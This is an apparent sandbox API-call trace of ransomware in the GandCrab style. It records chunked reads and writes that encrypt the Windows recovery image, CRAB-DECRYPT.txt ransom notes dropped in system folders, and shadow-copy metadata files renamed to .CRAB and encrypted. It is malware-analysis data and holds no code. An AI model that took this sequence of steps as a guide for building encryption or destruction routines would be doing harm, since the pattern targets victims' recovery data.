File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 1048576, size_out = 393234 True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 393248 True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 256 True 2
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.CRAB, size = 8 True 1
Fn
File Create filename = C:\System Volume Information\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2456 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 2464 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2288 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 2288 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
